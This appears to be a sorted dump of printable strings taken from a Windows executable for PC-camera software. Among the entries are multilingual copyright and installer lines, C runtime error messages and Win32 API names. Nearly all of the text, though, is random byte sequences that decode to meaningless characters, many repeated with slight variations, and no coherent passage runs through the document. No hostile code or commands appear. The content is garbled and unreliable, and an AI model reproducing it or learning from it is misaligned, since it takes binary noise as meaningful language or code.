tkhN<;U84X90V2*T4)R5,+ES)FU2P[>[`SmgVreSmgF`f7Q]1KW-JX.NY5Tc2Sb5Ra4M]2LZ.DO*=D+>C*<G*<G(<G(<G'=H)?K&>J$>J&<G'69%13%32$21%13)57(53)25,58,58,59.7;/5:58<:;?8;?4<<1><0A>-?>-AB.AF*<C*8>)8;,9;+79.:</;=4@B2@?-:<*68,8:-69*363;;3;;4<;9AA8@?<BA<ABBGFBGE?DB?AA?DBDIGGLJDMJCPNITRQRPVKG
?[TKo^U
~T?=k[U
T?}L6zC.wE/wD4~K;
T?}L6zC.zE1wD4~K;
tlnaY\LEYH?_LDfRGiXOqaUzh]
TLOSS error
tlo_X[IBS@8XD9YE:YE:ZF;]G;bJ>bH:iL>qRC|[K
-T:LqQd
tl}slxol
tl`TDi
TL|UMwSK{VH
t{~LUX@JJ>FE;CB6>=[a`{
|$	t"	m"
TMqA;]-+R%
-T;MrPd
 TMRsmn=24)
 TMRtmp=24(
tmwbZ}jc
tmzqjw|q{
t&nb/id9jhd
T_NEjQG
T]NEM<3O<7TA:YC>dLFkRNvXW
TNePU^=NQ,G\&Bq4Hx37O%
t_njWfZM]KARE;KB:ED<CH;CA:A@9>D9CD7E?7B:3:@8BC8@B14<,3>-1?/6NCKMFMB@F@CH@BJEALHBMJ<GLAIL:GN:GK:CL>DQ@DRAJPCQK:HH6GL>PLCWNEYQGXRES]KXiVeldu]M_YPd{o
TnuPjpZns[nqo~
T[|NUvKTuBKlGPqISuHPuFNsFOtJSyQZ
tnvd]zf[vc[
tnv\Ux`T
Todos direitos reservados
Todos los derechos reservados
ToFilnH
~{tolwrodecGLK
t|omy_exWbxUayV^uPTlVThkam}lp
TOoLJVLWT7MH/H\1Hx7Kz/6I&%
tooltips_class32
 to oprogramowanie.
Total espa
Totale spazio richiesto:
Totalit
Total space required:
T-%O*"T.)W1,T0*P,&O+%U2.V3/Y63[85M($N)%M)#M'"U1+Y71^;8^<<iEEvPN
Tous droits r
T^oWart
]T|[Oy[Rz^W|[SxTLtMIs@>l99i66d11_42`0,]*$U*
%~{ tp,
t|pnz_exVawUayV]vOSkVTgkam}lp
tppd^h\Vi^Ve[Qc[N^XKb\ObXNfWNdUL`QH^TJcYO_UKWLDSH@VJDYNF[PHWLDVKCQD<VG>gUJbQHXHA\OG\LE]LCSA6VB7XB6W=/X;,^A3^?0W:,V6)Q/
}}tpplkmjf
tp}uj}tn~wn
tpunkson
tPVi`Wg`Xf``gbeh_edZjh^cdZfkbZe[`i_]h^PbUOcVJ^QRcXGWPCOODPTGRVGSSAUVBTSLXXQYYP[_GX[J\]P[YRYTU\UKVLV\QTZO`dY^cZfhbhgcqiil_akaZnb\xha
tPVi`XhaXf``gbeh_fe[jh^cdZfkbZe[aj`]h^PbUOcVJ^QRcXGWPCOODPTHSWFRR@TUASRKWWRZZP[_GX[K]^RZYRYTT[TKVLV\QTZOaeZ_d[dhbhgcqiim`bkaZma[xha
T$pWRh
T(Q4=U8AY=C\BHbFLfKOoVZxafzeh}fj~gk
T(Q5;S9?W=C^BHbFLfKOoU[z`f{fi}fj~hj
}}tqokjlie
T$$QRWWh
TranslateMessage
tR>cg8ei6fh6fg=cg;df<dc9cb;df9bd5`]2]T6[S0SO,NN)JM)IN(GJ(DD-CA*BB+EE-FH+GH+IJ1NR2SV.QT0UY+OU:XY2IK2HM4JO3BE:CF8EGCPR9EG6BD@LNOX[DMPENQU^aISSU]]\dcktqfmhu{vu|unto{~u
tR>cg9fj8eh8fg;dg9ef<dc;cb=df;bd5`]3\T6[S1TP,NN)JM)IN)HK(DD.DB,AB-EE-FH+GH+HL0OR2RW.QU0UY*NT:XY3JL2HM6JO3BE:CF8EGDQS9EE7CC?KKLXZDMPENQV]`KSSV^]\dcmtqfmhu{vw{unto{~u
TReCC[58T/4U66^37`38e38e<Bo:@m8>i9<i58ePPxop
TReCC[58T/4U66^37`38e<Bo:@m8>i9<i58ePPxop
TReCC[69U/4S66^26_28e<Bo9?l8>i9<i38ePPxpq
TR~_^}fj}hp{gl{gf
trfZZ1&)927vpuOIN!
TRHL9,Q9-U<,];._<.fA3uTE
TRQGBAoid
trqKQP|
TR~QN}QP
tr~rnxoltllsnmttt
tr~rnxoltllsnmuuu
trujlpbfsbetbc
_[~TRv[Y}]\
TRv[Y}]\
trwjlpbfradu`b
T[|RYzKRsCLmGPrHQsENsGPuDMrJSyPY
T[|RZxKRsCLmGRrHRtFOtGPuCLrJSyPY
T}s3zj
=.T=-SB5SH@RJCTRJc_Zllf
TSpDEc9:d:;d=;iB@_63T,'V,'a5.d6.X*"U'
TSpDEc9:d:;f=;iB@_64V+(V,'b6/d6.X*"T&
{T~S>]RJ
t#SSUP
{t{ss|wvjmkMRPz
%T &S")T"+V!-W!0W 1X!4Z#6["8b!8e&6a$.]
TTB;L;8R=;R@9YF?iOHsVR
tt}inwhptisriswhptemtflseiregqeesfhtgikbejadoekrflnbhj\`vgk
tTisrv
T<tJ3{I7
Tt=]KDp]U
tt{mnzmkxlhxmitnirniutp
T$tPhx
}ttqitql
T``T\RT[NTXMTZO^bW_cXY_T]i]`nc`mecmggsm{
t.;t$$t(
...ttt}}}gggUUUFFF!!!
TTTvvv
!$&'TTZ
[-&T('U(1e8HnDVmCUj@Rc?Mf?NjAPnETrJVxOWqEKvFE
T(U8AY=C\BHbFLfKOoVZxafzeh}fj~gk~gk
tU.GW+GX*K[*J]0K`1I_,HY*HY0K`3Me/J^-H\*HY,KZ.M\*GV)BR'AO'?K(=E);B);B(9B)<D*=E*>I*@K'?K&@N#<F&9>(57&35'54(44(44'35&24)57*68)57(65*87*87/8;+77+77,5848=24<58<9AA9GC9GF7HK6IN:MT5HM<KNBNR9EG1==1;;6>>:BA?ED@EDDIHHJJKLJLJIFBAFC?KHDMJFKHDAB@>CA;B=6@:4=:4:563.MB:wd\
tU.GW+GX*K[*J]0K`1I_,HY*HY/J_3Me.I]-H\+IZ,KZ.M\*GU(AQ&@N'?K'<D);B(;B':B)<D*=E*>I*@K(@L&@N#<F&9>(57&35(44(44'33'35&24,58*66(44(57+79+79/8;+77,88.5847<24<58<;@A9GC8FE6GJ6IN:NS5HM;JMBNR9EG3==1;;6>=:BA?ED?EDDIHHJJKLJLJIGCBGB?JGCMJFKHDBCA>CA;B=6@:4>84:563.MB:wd\
t$(u$h@
~t`UjR@mN7
TU|RS|RS}ST}ST
TU|RS}ST|SQ
TU|RS}ST}ST
Tutti  i diritti sono riservati
tV=bj3ai3ai4bi9gh6fg6de4ec5ef3ce1^a-VY)LP&HN&GP'IO)KQ(JP)GL'CD)CC'CC(GF(HG(GH(IL)LO,OS+R[*O]+JS'9@2>B-9;3?A2@?0>=:FF7DB>KI9FD:FFDPPCOOBNRHUWCOOKWWMYYNXXJUSITRT\[`feflknwtchfrqm
TV~MRyLQxCKpIRwIRtMUzJS~GT
t$$VSS
_`tVVhKJZ@@N77E11A(,7()3)&/*#(4')2&&6'%;(%@*%G,(K,)P.(T3*U5*X8+V9+V5"U3#`>.\>+J-
TVyUVrVXpY[sY]u\avZ`wX^uU`tDPl&;h"5r-7g"!5 
tW0Zf)[g%Ye'[g/`j/`j/\g-Ze+Yd+Xc)U\-SW*PU*PU'MQ'MQ'OT&PW(OW&JP(GP(IR'GR%BP%@N%<K*?N)>M)AM(@L&:?&35'35(44)33-77)57(14)25(14-9;.;=+983A@4AC.;=7ED9FH3@B5BD9EI5AE9BE@GJGKPPUXZbbaljlxxbnrBV[:KN?KMBGHAFEBDDADBBC?LIENKGQLILGFKFEFBAFAB@>>;><4971851:7-32/202.)PE=
tW1Ye(Zf*\h,_i3_l0[j/Yf*Wb(Va*Xc*X`+RZ+OU(LR)LP'LP(MQ'MR(MQ(IL'FI%FI(KO%IO$GQ&FS'DS(BR)CQ*BN&9>(46(46(44(22+64(46)25)25,88,88.<;0=?9FH9FH:GI:HG6CE=JL<IK=JL;GIAMMDQSCNRRX]_dekqpkvtjusIYX@MO@IM=EE<C@>D?AE@EFBKIHIJHGGGDFFBDDAAA>>>===7779:8283*4..52,2-20(JA4vfU
T-$W5/L+(U33Q0-P0+K+&P-)L&!L("V2(O(
tw{,&'A!
tw{,&'B"
T?wM6wI1tI.yN3~O9
tw{NSTFNMBOMCQPCRUEVYDWZP]eZhn\jpTceJ\[JZ`L[dL[^K^cRcpVixQaqETdBNZ;DN7:I;;IXX^
tw{tw{,&'B"
TX{18_6?k7Aq6Cq3Aq1?s5Hu7Jw<Lz@L|@Jz?Iy?Hz5?o,2g
TX{18_6>m7Aq7Cs3Aq2@q5Gv8Jy=M|@L|AK{@Jz?Hz5>p+1f 'Y
T_(Xd-Zg8ep8cl%PY-Yf7bq7cp6ap:fw7dr?jyLw
?%_#txg
TX{GKnRVyVY
TX{HLoRWxVY
TX{HNqLRwV\
\T{]XmWQgPHZC;^B;dJCjNC~PI
tx|q{kfuW^qR`wN_zJ_zL]xJ[vM[wQ_uT\m\Xcxgj
TXt=Hf3>^<FdHSo>Ie?Hi:Cd9Ca6Cc2=]:Ee;Hh:Gg?Km>HjAKmHQsJRwRY
TXt=Ie3>^<FdGSo=Ie>Ii9Bc9Ca6Da2=[:Ee;Hh:Gg>Jl>HjAKmGQsJRwTZ
t_xt_xp[to\uobzja{j_yj[vlVrgWviY{iSpjRdsbm
TXu_c{^hz
T$XWRP
``tXWuVU
tx}y}~
T-$Y40N+(U33Q0-P0+K+&P-)L&!M)#U1'O(
tY][OO[NPVNNRMLTMPVPUURTZUV\RX
\T{\YoWQgPH[D<^B;dJCjMD}QJ
\T{\YoWQoWQgPH[D<^B;dJCjMD}QJ
ty|q{kgsX_rQ_vN_zI^yK\wJ[vM[wR`vT\m[Wbxgj
Ty_Qx^Ow^Is\EnYGkZJiZEeTCeTCdUCdU=_T<^S;_O?aP?aP<]N<[L5TE.O@%:1(-+nac
^TyUM{TLzLDwF<}LB~QF|THvQCpJ>iC7mC7rE7zG7}L<xI;uJ;{QD
^TyUM{TLzLDwF<}MA~QF|THvQCoI=iC7mC7rE7zG7~M=wJ<uJ;{QD
T_#Zc2ip6mt2ir5jtBy
T_#Zc2ip6mt2ir6kuBy
TZ|NTzQVzV\wSYxRXpS\kS_nTatYcxZ_~[_
tzrlw\crS`vL]wI\wLZvKYuQZuT]qX[jbYc}hj
]@}T>zTB
`^tZUp
$ < u	
u0"|9/z9.s7,
.U 0U6HmBTy1Di%8^$7b$7d!1` 3^)=f0Dg%<\1Ig3Ki7Lk:On:Nm>Mm<Nk>OjESoHWqVf}[l
(u<0}@)v9/
.U!0W8HmBTy2Cj%7`$7b#6c
u1)|92w92o70
U1'a0"v<)
U1'I11I42G63P<7T7.X4"R2
+"U=1UB5UB5S@3\F:^F:_H9aJ:gH9hG8iF8gD6jI:pO@qNApNAmM@kMBlRFqYMs[OrWMuXQuYRsXNlPIeSHmYNp[SlZSnaYm_YiaZf]Yk`\j^Zj^Zg^Zc]X_\T`]Ue^Uh_Vl^XgWQfXRl]Zo^[s_^scdvjhrgco_YiVOpZTkXQfSNfURl\Vr^YlVQmUOoYSmZSkYRmWQhQIjPInSInRKpVPv\Vs[UmWLsXNvZSqWPnUKnVJlRDqQDqQFpSEkQCpXL~cY
U=1W<.pIA
U2.U99\ADV>@K20P3/H("K'
U@^4'aG@
U;4X=/fG8uN?
U@_5(bHA
}U63iNJ
}U63jOK
&u6#q4[
U/#\7/n@5
u, |8,
U8/I92!
U@8kD5
U9Ft[g
%U*9qZi
UaaT\RSZMTXMTZO_cX_cXZ`U]i]`nc_ldcmggtl{
U_ ai6|
Ua}R_yao
Ua}Ua}R_ySb|\i
Ubd5B@4=:FMF:?=EJH{
U\}BNp7Gk=Im>GiGOmQYvS\wHPm=DeGMpGPrGPqENo9Bc7Dd=Jj?KmCOqBQr@LnNW|QY~S\
ubs[HWZFSyeq[FOR=EI38WAFkW\
ubsjWfQ?LxgrdS^WDME3:E48C18:)-6%)<+/I8<ZKOH9A4&18,@8-G3(I1#E9+G=-D2"31 .2!/0
Ucb5B@4=:FLG9><EKF|
[]uCMe<Ke/>X+;R-;Q(;P(9N)7M*8O(6L,;NEQc9EWX\ttw
Ud~FSi29H*,6259PVUMVSy
[]uDNf;Jd.=W+;R.<R)<Q&9N'8M*8O(6L-<OFRd9FVX\ttw
UdwL[nS`vQ^xS`zTa{Xe
UDwL=~SB
UdwLZpS_wQ_vS`zTa{Xe
}U]D:xWN
UDyA0{E4
>Ue2FQBV[
>Ue2FQCW\
uE9wTJVA9V@5]>5
Ue|ESjJUpq}
Ue|ESjJVnq}
>"u:F@
;Uf'BL.HN{
Uf)\l3cu3S`
`UfPJbLFaRImZS
`UfPJbLFbRKmZS
UF}]PpSEsUJrWIwTF
UF~SB~T=}M5{D/wD0xE5~K;
UF}SFwF8sD6rB6sD<sH?qNAvKBzLDwLCrE:sI<|Q>
UF#UI$HB
UF$VJ$HB
UFz[RmRHsVHxWHuTE
Ug~O`uUfyZk
Ug~Uh}Vh
UGuJ;{K?
UGvI;{K?
UGzWMcG<_D6`F:lRB
U`hDMWCGRBBRA>N?<LA>M<9H74C52A01;'*/?BG
uhfqgg
uhfrhh
uh~h]u^OiVGr^M
u<h`IA
{~uhqh[jaTf]Skg\pjcqmh>:9###
{~uhqh[kbUf]Skg\pjcrni=98###
U`~HSo;FaWb~~
>*U^Ht
UHt^LnpZa
UH~UF}RA
u|iazjc|lf}li~ji{feiRWX>KC,4:*+6'$7(&<-+A2/?0.5'(3%'1$&2&&1''2')0%'2')0'*4,-:23NIHnihlghbei]iojz
uicdMKaD=jF<oF=xK>
uieeYUm^[q`]xe`}jeue_ta\o_Xn^WqbYud[sf^
uiegXUl]Zq`]xe`}jeue_rb\p`Yl_WqbYud[tg_
uiiD<I,'A-,:+/7*,6'%>)+?-.@./?-.<*+:()7%$:('9*'8'$7&#2# 3"
uiiD<I,'A-,9+/7*,3&$>)+?-.A/0?-.;)*;)*8&%9'&;)(8'$7&#2# 3"
ui{ihzhi
Ui{I\qN`wI]vH\uJ]xL_zNa|Rc~Q_{Yg
uj~dX}eY|dX~cU
u\j_GSjR^dLVS<DE/4H15G//T=;Y@>E++E-/Q9;>(*:"":
u\j_GSkS_bLXS;EE.6H15G/1S<:Y@<E,*E-/R:<>(*:"":
UJoRI`E;Z>7]A:mPG
U`~JUsU_}eo
UJwM@rI@vJC}OGzPK
UJyLAqG@vJC}OGzPK
U^kGP^JTeNVgY`oy}
ukksgerfbl]Zo`]h\Xk_[qecsjgsjgvolohe
U\}KTuMVwFOpGPrLVxKTvGPrJSxJSyQZ
uLIwDA
uLIxEB
ulo|gpk\`bWYaYYibe
ul}slxol
UltUerI[fRdo.DP:T`Tp{DahNkp6NT)DH/MN9WX<UYCW\k~
U\}LUz:Fn5BhEOqNUvRYzS]{KTuNTwKQtJPsHQs>GiCLnHQrHQsMWyIRwHQwS\
ULyWG}RC
UM^E;H5+7PFRYPZF=G0%-'
UM^F<H5+7PFRYPZF=G0%/'
	U;MhOy
uMpr.{
Um programa de total solu
UMQ|y{tqrGAC
.	*U MxGq
UM~ZR~cY}c\ub[t_Wr\Vt^XyaU~]N}UC
- unable to initialize heap
- unable to open console device
Una soluzione software totale per l'uso della camera
- unexpected heap error
- unexpected multithread lock error
U`nGQ[IRVO[aXgpVdpfq
{U^NGtcZ
UnhandledExceptionFilter
un{ib{ibq_X
Unidad de Disco:
U`nIQ^GRVO[aXgpVdpfq
[UNJ4)M4*O7+T<0Z@4dF;oQFz]O
un{lk{tx
un{lk{uy
un|mdo`WfWNi]Szme
un|mdo`WgVMi]Szme
unnjeorif
un}oi|nh
UnregisterClassA
unsjf50- 
unsjf50-!
U>|N<sL=
Un software de solucion total para los usuarios de camaras-pc
unvpeye.ini
UN|XN{WOyWQ|VQ~XS
unzfe|ilygnq_fwfoqbjvdkyac
unzfe|ilygnr`gvgopaiveiyaa
unzhazhaq_X
%U&)O'*858G
%U&)O*+958F
Uo{E\lRfx\p
{U\OG{kd
UOHQNIYPM^SOaXOpWMz`O
UOHUB;VC>\IB]QKg\Ttg_
UO}ICs>;g42`/-d51h95e62d40i93f60_1*b3/e70c5.e70c4,\-%\+!`0$`0$b2&h6*s?3
u\oJ0g9
U\}@Op7Gk=Im>GiGOmQYvQ\wFQm<CdDMoGPrGPqENo:Ce7Ce?Ik>JlCOqDPr?KoMV{PY~P[
U[|ORzQVzV\wRZyRZpS\jQ_nTatYcxY`
uotxqt
{UOUlGMdEIaABW89N-0E')A&$8
uo}un{uptfgwkktde{li
uov\Ux`T
UOzHBp=:e51_/-e62g84e51c3-i93f60_1*a2.e70c5.e70c4,[,$\+!`0$`0$b2&h6*s?2
UpdateWindow
{U]PHrcZ
{U`PItcZ
U[PJ<*O9-P:.W>.bC4mK;{^O
u\pK1h:
#upnphostKn&s
u,#p'"S$"=$"9#"6#!4#!3#!3#!4$!6
Upt6QU?^aAjm;qr9op3yr
U__PUVVXX_]\XTS^WT_VSaVXUJLSKLXLL]NKQC=^MJ\IDhRLdMEcMGdNHmSMfOG[B@hOMu\Z
uqF10pZ\
uqh\Xk_[o`]tc`zif{jgvhbmcYh^Tl^Xqearfd
uqh\Xk_[o`]tc`zif{jgwicmcYh^Tj^Xqeaqec
~~uqmihkih
}~uqmihkih
~u|qmokfokfqhdig_gb_fc_me^zul
U==qRSzQOvFBrA7p90a-&T$ O#"`:8
U==qRSzQOvFBrA7q:1a-&T$ O#"`:8
uqsnkson
UQ~TO{QLzMJyLItGDnD?m@<f:9sKM
U__QVWVXX^\[XTS^WT_VSaVXUJLTLMXLL\MJQC=^MJ\IDhRLdMEcMGeOImSMfOG[B@iPLu\X
uraNKbOLbOL^KH]JG\IFeQLeRK^JE[GB_LEcPK^OL`TP
uraNKbOLbOL_LI]JG\HGeQLeRK^JE\HC^KDcPK`OL`TP
{U_RJwh_
~u|rknjeqkfqhdih^gc^fc_me^zul
URLDown
u{rlw\crS`vM^xI\wLZvKYuQZuT^pWZhbYc}hj
UR~RQyPNxOMyLItKHpJFkEAjA>e<9b96\62Z40X01W02W02T..S--T..X13b65hACzWauTbpP[wXajLWqWd
UR~SP|QNyNKyKJtKIrIFkEAgA=e<9b97\53Z31X01X02W02T..S--T-/X13a54h@EzWatSaoN\wWbjLWpVc
&U$*S#
{!us4\
Uscit*
user32.dll
USER32.dll
User Guide...
UserName
u(s{$h
USHQA5VC;Q>6Z@9eSHnTHxYJ
Us>\IBoZR
u~siuZP`A7G:0=>0<H7EM=NM@NJ@PMDQ[R\qek
(U@S~`q
|}usrQUPBIB@GD@HH?II?KE?JB?FA;F<<E;;C<:B;7?83<21:03<2675421422/0.+/*,,&2'
|}usrRVQBIB@EC@HH@JJ@JD@HA?FA=F<<E;;C<:B;8@93<21:03<2675421422/0.,-),,&2'
u}|s|y
u}|s{z
uT:a_9ef8dc:eh;ed9cb:`b9bd8ac8`_4\W2XR5ZR5YS,QO/NO+JM&CG%AB)CC+CC/II&ED7NP.KO,NN/RU:Z_4U^:W[9TQ1NK-KL<RW=OV7CM5DG>JN<HJAMMGUTCLOCMMT^^[eeWaaU__muueoiotrrzs
uT:a_9ef9ed:eh;ed9cb;ac9bd8ac8`_4\W2XR5ZR4XR,QO/NO+JM%BF%AB)CC+CC/II&ED7NP-JN+MM/RU:Z_4U^:W[9TQ1NK-KL<RW<NU7CM5DG>JN<HJAMMHTTDMPCMMS]]\ffWaaU__ltteoiotrqyr
[Ut\\bMO`IMcNPxbd
UThAH\9E]1?V,:Q3@V8FX5EV1AR5CU8BTCM_Uas=H\1DS^dw
U\tNTmDKkIOiOUeMUeLVmOZoMWrKSvMUuPXuPZtR]tVaz\g
U\tNTmDKkIOiOUfNVeLVoOZoNUrKSuLTvQYvQ[sQ[tVaz\g
&U!'T")T"+V!-U
{UTYrOUlGMdEIaABW89N-0E')A&$8
U@}T>zWC
U\uBMhDLi=A]/6J3:K7@N8?R9@T<D[;Fa6C]6D[6CY5@T=D]?Ia=Hc;Fb<DaDKfGKgMRkMSpHRpMTuV[zac
U\uBMiDLi;B]/6J3:K8AO8?R9@T<D[:F^6D[7C[5BX5@T=D]>H`=Hc;Fa<E`DKfGKgMRkKSpHRpMTuV[|ac
uu}inwhpsgsrhtwhpsdltflseiregqeesfhtgikbejadqekrflocik]avhj
U:uM1jE+X9"Z;&mUCyfWj[R/' 
~uurjuql
UUU|||
{UUXtOTmGMdEIaABW89N-0E))A&$8
u}|VaeIV^ET]EW^GY`HZaL_dQagVfmZkt\mz]m}[mxVhsQboN^nJZjMWhQXi[^lijt
uv~pr}oq
UV|RSyNPxLOuNW}PV{SY~QW
UV|SUsSTnTXpVZsW]tY^wV[tT_uCQm&;h!3p-5d#"2 
UV|SUsSTnTXpVZsX\tY^wV[tV^uCQm'<i!3p-5d#"2 
^Uv[WeXVhgi
>"(U(.W!
UW_1,55+1>4:F<BE:B/J^0K_2N_5R`:T`9T^:T`6P`1M^,KZ+KX-L[2Xd=`nC`nBUb5DT0@M*<G,?G'=H&>J(AK(>I)BL$@K&?I&9>%24'35,36.3604902:57?;:C8;C8=@7??3A=5D@/B?)=>(;>&9@%7>'7>)8;'46"0/$21%32%13(14(14(14'35'35)25*36(14$-0&24&24#/1+47,58+47,36(443><;>B4=@<@ADILDRXNegm{
uW=bj3ai3ai3ah8hi5gg4de4ec5ef3ce1^a,UW)LP&HN%FO&HN)KQ(JP)GL'CD(BB'CC(GF(GF(GH'HK(KO+NR*QZ*P\+JS&9@3?C-9;3?A2?A0>=:FF7DB>KI8EC:FFDPPCOOBOQHUWCOOKWWMYYNXXKVTKSRT\[`feekjnwtchfsrn
uwLIK-,?-.:,.6(*4&'>)+@+-A/0=+,<')7#"6$#7%$9(%7&#7&#5$!5$!;'&=(';&(,
uwLIL.-@./:,.6(*5'(?*,@+-A/0?*,=(*7#"5#"7%$9(%7&#8'$6%"5$!:&%=('<'),
:uwN;4_D:|bV
uw}rt~su
UWvTVuXY{^^
UWvTVuYZ|^]
UWyNPrTVx[\
UWyUVpUWoY[sY]v[`uZ`wX^uW`tBPl&;h"5r-7g"!5
uwzoq{qq
uX0Zf*\h&Zf'[g/`j/`j0]h,Ze,Ze+Xc)T]-SW*PU*PU'MQ'MQ'OT&PW(OW&JP(HN(IR'GR%CN&@N%<K*?N)>M(@L(@L&:?&35'35+55)33-86+47)25)25(22-99.<;+8:4AC3@B.;=7DF9FH3@B5BD:GI5BD9BE@GJFJOPUXZbbaljmyycosBV[9IO>JLCIHAFEBDD@CA@D?MJFNKGQLILGFJFEFBAFABB=>;><497185/:7-32/201.)QF>
uX8^j0]j1^k0^i1[h,Xe+Ub*Wb(W_*Wb+Ua*MZ*KT'KS)KQ'LP(MQ'MR)LP(GH(DD(DD(FG(IL(JP&JT)LY(IX*HY)CS':A'33*66(44+55,440<>,88-77,883??5CB;IH<IK;HJ3@B8EG<HJ@LN:FHEQSEQS@LNJXWDRQU^a`eheijjonnurRYVDMJ@HH<FF<GE?ICBIBBFACGBCGB@D?ADB=@>;?:6:58:4697453150-3.)0-'+%1,#N@4vbQ
uX9_k1^l1^k1^k1[h,Xe+Ub*Wb(W_*Wb+Ua)LY*KT'KS)KQ'LP'LP'MR)LP(GH(DD(DD(FG)HK(JP'JT(KX(IX*HY)CS&:?&43*87&43*36,440<>+77+77+773??5CB;IH=JL:GI3@B9FH<IK@LN:FHDPREQS@LNJXWDRQU^a`eheijjonovsSZUDMJ?GG<FF<GE?ICBIBCGBDEACGB@D??DB>A?;?:8958:4586453150-3.*/-'+%1,#QA5vaR
UXg:BI-:</;=-8<,9;,8<-:<*79+8:)68+8:-;:/=<.;=*79*79)68,9;,8:)57-69)680<>09<-69-69*68+79+79+55-77+55+47*66-:8-86-77(00,12,75.97-69/8;3:=:IL?glt
UXg:BI-:</;=-8<,9;-9=-:<*79+8:)68+8:-;:/=<.;=*79*79)68,9;+79)57,58)68/<>.:<-69-69*68+79+79+47-77+47+47,66.97-86,75'/.,21-86/:8-69/8;4;>:HN@hmt
U@xN7xJ2tH0yM5~P8
U=xO9tF4
ux{pxfiw[ewSaxQ`zS\wNUpOVjY\kfclshk
ux{pxgkv[ewSaxQ`zS\wNUpNTkY\kfclshk
UX~UZ{T[|T\zU[xX\xT[tY]uX^uY]yX\yV^|<Lw
UX~UZ{U\}S[yW[xX\xT[tY]uY]uZ]yX\yV^|<Lw
UX~VYxV\yV\yY\xW\uU\u[_wY_vV]xS[xS]{8Gu
\@{U=xWD
uxzqtxntwltxmu|qy|nt
U]\Ya`ionotsyyy
{uyfc_LIgTQmZWkWRaMHaNGdRKlZSl[RfWNjWPgTMUH@WKG
U?yL7iB,a9'Q4&K-"A'
U?yL7jC-`:(Q4%K-"A'
{uytqvt]cbT]ZV[\NXXGSWCV[CT]$9A
{uytqvt]cbT]ZW\]OYYGSWDTZCT]$9A!3>0@P>O\=OZBU]O`iUelVdjS_cP\`DPTCPRQ^`]kjR`^Sa_O\ZWdbmxvmrsU\_
UYu+<W%3O0?YN[uJUq8Ca+6V1>^5Bb7Ac;Eg3<]7Bb;Ff<Gg>Ii=Hh<EjAJo?Hm?Hm=Dk>ElTY
UYv`d|_i{
)U%+Z',]$,[)0a*9j3Dw>O
{uzgb_LGgTQmZWkWRaMHaNGdRKl[Rl[RgWPjWPeSLRG?WKG
uZ/K\*Ma+Se,Si0Vh/Ug+Ra,Tg2Xj/Qh.Q_-Na*Q`-O_.Q_&IW'EV$BS&CR'=I):C':B':B(;C)<D)=H(>I&?I%?K&>J':?(57'46'54*75'33'35&24(46+79+8:(57(65*87*68+98+98+981:=17<7<?AFIDKNCMMESR>PQCTW>ORFV\DRX:FH1=?4>>8@?=CBBGFGLJGJHHIEEFDFEAHD?LIAMHEKHDHHB=><?B@8>95<729627573.G:2
uZ/K\,Ma.Tf,Si0Vh/Ug,Sb,Tg3Yk/Qh.Q_-Na*Q`-O_-P^&HX'EV$BS&CR'=I(;C':B&9A':B(;C)=H(>I'@J&@L&>J':?(57'46(65)64'33'35'33(46,8:,8:(57)57*68)57-99,88+7709<17<7<?ADHDLLCMMESR?QPDVW>ORGW]ESY:FH2>@4>>8@?=CBBGFGLJGJHFJEEFDFEAHD?NHAMHEKHDGGA=><?C>8>95<729428373.G:2
UZ{MTuRYzMUzIQvJRwCLn@HmJQxKRyQW
uZ^[OO[NPVNNRMLTMPVPUTQSZUW]SY
uz}q}gguY`tT_zSa}Pa|J[vGXsKYvR]xU\p^Zf|fk
uz}r|gguY`tT_zR`|Pa|M[wGXsMXvR]xV[p`Yf{ej
uzvlxcbrZ_tV_sY\qYZng`o
uzwmycbrZ_tW`tY\qYZng`o
uzxafbKPL8=;*.0
uzxejiklhimhmqlkpninmfjk
uzxejiklhimhnrmlqojonfjk
 %,/UZY
V/	`-	[#
V05~[`
V0+O*&U0,Q.*O,(M*&T1-P-)L*$Z60Z5-D
V1-V3/T4/Q21V74Y:7^?<[=8O/*M-(T52_?@]@CiHL
V1)X1(R+"V5,T<6SA:P=6O;6P=6SC<U@8T5,V3)]:0Z:/T0(M0+Q1+T7.[>7Y=6\@9V60V3/
V1)Y2)R, V5,W=7TB;P<7O;6P=6SC<VA9T5,W4*]:0X:/T0(L0)P1(V7.[>7Z>7\@9W71X60Y93b>6_C8dD7]1$[6(W9.W;4T@5V=3U=1ZC4Z>3e=1a5(b>4cC8c5-gGAZD?WC>TG?XE>WDAVBA[GBaICc<4d81_:2`1)c4,^;7\C?VC@R>9W?9WD=]JC\B;`;-d?1cC8c=8^68[6@Y8F_?PdGViJQgKQ_CIY@D^IHgOIfSNePNeFIa>He?KX;JT9MP6MT>V[Pd^Ne\F^\OeaYpb]rc_rncwsizsftiYd^CM`=GfDNiGQdBL]BFZCGbIMqVZpW[w^bz\az\a
V1)Y2)R, V5,W=7TB;P<7O;6P=6SC<VA9T5,W4*]:0X:/T0(M1*P1(T7.Z>7Z>7\@9W71U50
V1)Y2)R, V5,W=7TB;P<7O;6P=6SC<VA9T5,W4*]:0X:/T0(N*$V,%T8-VK=O]KF
v 2000-2001 
V2,P,&S0,Q.*Q,(O*&V1-S.*M+%X60Y5-E 
V30U98\BBX=@L31P3.H("I(
V3_3o3x3
V=3_I=mSE|_P
V3&mPA~VC
,V"3Z2Cj=Pv,=d"5[%7`(9d"2` 0^#4_)=f0Ch0Fi@Xv?Uq?VpD[uG]vJ^wH]xH\uN_ySczXh
,V"3Z3Dk=Pv->e"5[%7`&9d 3`
(V'5_-=h+:h+;f
V5!V<,YD5L>2*!
V5!V<,YD5M?3*!
V61Y8/\<1fD7hE7kD5rR?vYJsUJ}^OwR>uM4
V6C|]j
+;v&6k4BrR`
+;v&6k4BrSa
V6sion\
V7}H-o=&h9#^5
V7}H-p>'h9#^5
v7Os2_qWSArcvF
*V"8[1Ie1Lg
*V 9[1Ie2Mh
V9uM0iD*X9"Z;&lTB{fWj[R.%!
V[|AJp:FpBLtHPuPWxQXyT[|Y`
V=b,	=5
<VB7fL@
V[/be8ei=agQqv
VbfLU^FQYIU_T`lQZgCPXlu
;+,vc`
VC20XC00U
V\cNY]RZkU\mY_lY_jZ_hWXbVU^SW\PY]NV]EJS:CL6>E4>E2>D1;B2>D/;A0<B/;A0<B1=C1=A3?C3?C0=?-:</<>0<@0<@.:>-9=3?A0<>/8<-6918;29</99-77/6907:3:=4;>29<4;>3;;4<;4<;6>=28=1=?8MOQu}
VcqYboT]gHRY>IM@IRBIRBJQ7CG>JTKhvu
vct[HWYERxdp[FOS>FI38W@HkW\
vctjWfQ?LxgrdS\WDME3:E3:B079(,6%)=,/I8;ZKOH9A4&2:+@8-G2'H1#E9+G;.D2"31 .1 .0
vct[PZPBH9'.0
}VC;U92W;4V:/Z=/`?0jG9tOA
